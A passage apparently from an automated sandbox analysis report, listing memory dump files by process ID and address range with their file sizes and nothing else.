                                                                                                                                        • memory/6460-338-0x0000000005670000-0x0000000005671000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/6468-302-0x0000000000000000-mapping.dmp

                                                                                                                                        • memory/6468-336-0x0000000004A60000-0x0000000004AFD000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          628KB

                                                                                                                                        • memory/6508-351-0x0000000000400000-0x0000000000409000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          36KB

                                                                                                                                        • memory/6508-348-0x0000000000000000-mapping.dmp

                                                                                                                                        • memory/6544-449-0x00000000058B0000-0x0000000005EC8000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          6.1MB

                                                                                                                                        • memory/6564-310-0x0000000000000000-mapping.dmp

                                                                                                                                        • memory/6664-431-0x000001DB08A20000-0x000001DB08B04000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          912KB

                                                                                                                                        • memory/6664-435-0x000001DB08C70000-0x000001DB08DD1000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          1.4MB

                                                                                                                                        • memory/6664-314-0x0000000000000000-mapping.dmp

                                                                                                                                        • memory/6684-404-0x00000000020A0000-0x00000000020A1000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/6772-474-0x0000000004890000-0x00000000048C0000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          192KB

                                                                                                                                        • memory/6772-318-0x0000000000000000-mapping.dmp

                                                                                                                                        • memory/6796-390-0x00000000052A0000-0x0000000005BC6000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          9.1MB

                                                                                                                                        • memory/6796-319-0x0000000000000000-mapping.dmp

                                                                                                                                        • memory/6812-462-0x00000000025F0000-0x0000000002620000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          192KB

                                                                                                                                        • memory/6812-320-0x0000000000000000-mapping.dmp

                                                                                                                                        • memory/6972-323-0x0000000000000000-mapping.dmp

                                                                                                                                        • memory/7000-443-0x000001E660E30000-0x000001E660F91000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          1.4MB

                                                                                                                                        • memory/7000-324-0x0000000000000000-mapping.dmp

                                                                                                                                        • memory/7028-326-0x0000000000000000-mapping.dmp

                                                                                                                                        • memory/7144-330-0x0000000000000000-mapping.dmp

                                                                                                                                        • memory/7144-458-0x0000000005750000-0x0000000005751000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          4KB

                                                                                                                                        • memory/7156-513-0x0000000005910000-0x0000000005EB6000-memory.dmp

                                                                                                                                          Filesize

                                                                                                                                          5.6MB